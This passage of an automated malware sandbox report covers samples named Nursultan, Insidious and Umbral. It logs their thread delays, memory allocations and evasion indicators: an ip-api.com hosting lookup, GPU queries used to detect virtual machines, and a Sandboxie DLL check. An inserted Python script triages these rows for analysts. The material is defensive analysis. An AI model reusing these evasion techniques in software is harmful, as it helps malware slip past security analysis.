                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process information set: NOOPENFILEERRORBOX (20 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process information set: NOOPENFILEERRORBOX (64 identical rows)
                            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Process information set: NOOPENFILEERRORBOX (25 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process information set: NOOPENFILEERRORBOX (17 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process information set: NOOPENFILEERRORBOX (20 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process information set: NOOPENFILEERRORBOX (18 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process information set: NOOPENFILEERRORBOX (17 identical rows)
                            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Process information set: NOOPENFILEERRORBOX (8 identical rows)

                            Malware Analysis System Evasion

                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive (8 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (6 identical rows)
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Microsoft Edge.exe, 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.3.dr, Microsoft Edge.exe.0.dr | Binary or memory string: SBIEDLL.DLL
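The evasion rows above (the ip-api.com hosting lookup, the Win32_VideoController WMI queries, the SBIEDLL.DLL string, and the many SetErrorMode and heap-reserve rows that surround them) are what an analyst pastes out of the report when deciding which dropped process is actually sandbox-aware. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample: it splits each row at the fixed description prefixes (the HTML table fuses the Source cell onto the description, and "Jump to behavior" link text trails some rows), collapses repeated identical rows into per-process counts, and ranks the indicators. The sample rows are constructed in the shape of the rows on this page, and the high/low severity ratings and the prefix list are this example's own judgement, not a field the sandbox exports.

```python
import re
from collections import Counter, defaultdict

# Constructed sample input in the shape of the report rows above, as they come
# out of the HTML table: Source cell fused onto the description, and link text
# ("Jump to behavior") trailing some rows. Not a sandbox export.
SAMPLE_LINES = [
    r"Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive",
    r"Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive",
    r"Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController",
    r"Source: C:\Users\user\AppData\Local\Temp\Insidious.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    r"Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, Microsoft Edge.exe.0.drBinary or memory string: SBIEDLL.DLL",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Users\user\Desktop\Nursultan.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior",
    "Malware Analysis System Evasion",  # a heading, not a row: must be skipped
]

# The description cell always starts with one of these fixed prefixes; that is
# the only reliable place to cut a fused "...Nursultan.exeProcess information set:" row.
EVENT_PREFIXES = ("Process information set:", "HTTP traffic detected:", "WMI Queries:",
                  "Binary or memory string:", "Memory allocated:")
_SPLIT = re.compile(r"\s*\|?\s*(?=(?:" + "|".join(map(re.escape, EVENT_PREFIXES)) + r"))")
_LINK_RESIDUE = re.compile(r"\s*Jump to behavior\s*$")

# (label, severity, pattern). Severity is this example's own rating of how much
# each row says about sandbox awareness; it is not a Joe Sandbox field.
RULES = [
    ("ip-api.com 'hosting' lookup: asks whether the host sits in a data centre", "high",
     re.compile(r"ip-api\.com.*fields=hosting|fields=hosting.*ip-api\.com", re.I)),
    ("WMI Win32_VideoController query: GPU name used to spot a VM", "high",
     re.compile(r"Win32_VideoController", re.I)),
    ("SBIEDLL.DLL string: name of the Sandboxie hook DLL", "high",
     re.compile(r"\bSBIEDLL\.DLL\b", re.I)),
    ("SetErrorMode NOOPENFILEERRORBOX: error dialogs suppressed (weak; common runtime behaviour)", "low",
     re.compile(r"NOOPENFILEERRORBOX")),
    ("heap reserve with write-watch (weak; typical of the .NET GC)", "low",
     re.compile(r"memory reserve \| memory write watch")),
]


def parse_line(line):
    """Return (source, event) for a 'Source: ...' row, or None for any other line."""
    line = _LINK_RESIDUE.sub("", line.strip())
    if not line.startswith("Source:"):
        return None
    parts = _SPLIT.split(line[len("Source:"):].strip(), maxsplit=1)
    if len(parts) != 2:
        return None
    return parts[0].strip(), parts[1].strip()


def source_name(source):
    """Collapse a Source cell to the process or file names it refers to."""
    if "\\" in source:                       # a full path: keep the file name only
        return source.rsplit("\\", 1)[-1]
    # Memory-dump rows list processes and dump ids; keep the distinct .exe names.
    names = sorted({tok for tok in source.split(", ") if tok.endswith(".exe")})
    return ", ".join(names) if names else source


def classify(event):
    """Map one description cell to (label, severity), or None if no rule matches."""
    for label, severity, pattern in RULES:
        if pattern.search(event):
            return label, severity
    return None


def triage(lines):
    """Group rows by indicator and count them per source, so repeats collapse."""
    summary = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        source, event = parsed
        hit = classify(event)
        if hit is not None:
            summary[hit][source_name(source)] += 1
    return summary


def high_severity_sources(summary):
    """Sources with at least one strong evasion indicator: where to look first."""
    return sorted({src for (label, sev), counts in summary.items()
                   if sev == "high" for src in counts})


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for (label, severity), counts in sorted(result.items(), key=lambda kv: kv[0][1]):
        print(f"[{severity}] {label}")
        for src, n in counts.most_common():
            print(f"    {n:>3}x  {src}")
    print("focus on:", ", ".join(high_severity_sources(result)))
```

The split on description prefixes rather than on whitespace is deliberate: file names such as "Microsoft Edge.exe" contain spaces, and the memory-string row lists several processes in one cell, so the only stable boundary is the start of the description. The low-severity rules are kept on purpose so that the many NOOPENFILEERRORBOX and heap-reserve rows are counted but not mistaken for the real signal; on this report the rows worth acting on are the hosting lookup, the video-controller query and the Sandboxie DLL string, and the sandbox-side counter to the first of these is to answer ip-api.com from the analysis network rather than let the request leave.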
                            Source: C:\Users\user\Desktop\Nursultan.exe | Memory allocated: ED0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Nursultan.exe | Memory allocated: 1A890000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: E20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 1AB70000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 12E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 1AEE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 13D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 1AF40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 14F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 1AF30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: B20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 1A900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 24510C00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 2452A650000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: AF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 1A5B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 740000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 1A400000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 1DCB43B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 1DCCDDE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 2ACCE6A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 2ACE81C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 7A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 1A560000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 12A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 1ACA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 22382370000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 2239BCE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 17D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 1CFADC90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 1CFC5D30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 1390000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 1AD60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 2E6878C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 2E6A1370000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: E20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 1AAB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 11F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 1AE40000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 220C7960000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Memory allocated: 220E14C0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: B90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Memory allocated: 1AAA0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 2870000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Memory allocated: 1AA70000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: E00000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Memory allocated: 1A760000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 232B82E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 232D1D70000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Nursultan.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 599874
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 599765
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 599619
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 599501
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 599377
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 599075
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 598937
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 598703
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 598453
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 598150
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 598030
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597918
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597773
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597652
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597546
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597437
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597325
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597218
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 597104
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 596988
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 596861
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 596734
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Thread delayed: delay time: 596624
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 599079
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598930
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598766
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598599
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598352
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598230
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 598122
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597987
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597868
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597747
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597596
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597343
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597229
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 597110
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596983
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596872
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596756
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596594
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596375
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596183
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 596031
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 595874
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 595605
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 595447
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 595226
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 595100
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594958
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594782
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594641
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594487
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594358
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594232
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 594094
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593981
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593869
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593765
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593648
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593527
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593375
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593227
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 593090
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 592891
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 592735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 592532
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 592360
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 592204
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 592047
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 591907
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 591750
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 591621
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 591475
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 591356
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 591125
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590903
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590795
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590688
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590563
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590449
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590325
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 590188
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589985
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589860
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589610
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589469
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589340
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589232
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589125
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 589007
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588891
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588766
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588641
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588492
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588391
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588266
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 588147
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587969
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587735
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587532
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587396
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587261
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587151
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 587044
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 586912
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 586782
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 586645
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 586527
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 586422
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Thread delayed: delay time: 586309
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe Window / User API: threadDelayed 6533
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe Window / User API: threadDelayed 3175
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6114
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3314
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Window / User API: threadDelayed 1341
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe Window / User API: threadDelayed 1350
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Window / User API: threadDelayed 8304
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe Window / User API: threadDelayed 1302
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6566
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 596
                            Source: C:\Users\user\Desktop\Nursultan.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 4416 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe TID: 7636 Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 1088 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe TID: 6468 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 Thread sleep time: -8301034833169293s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe TID: 1852 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -10145709240540247s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -599874s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -599765s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -599619s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -599501s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -599377s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -599075s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe TID: 7296 Thread sleep time: -598937s >= -30000s
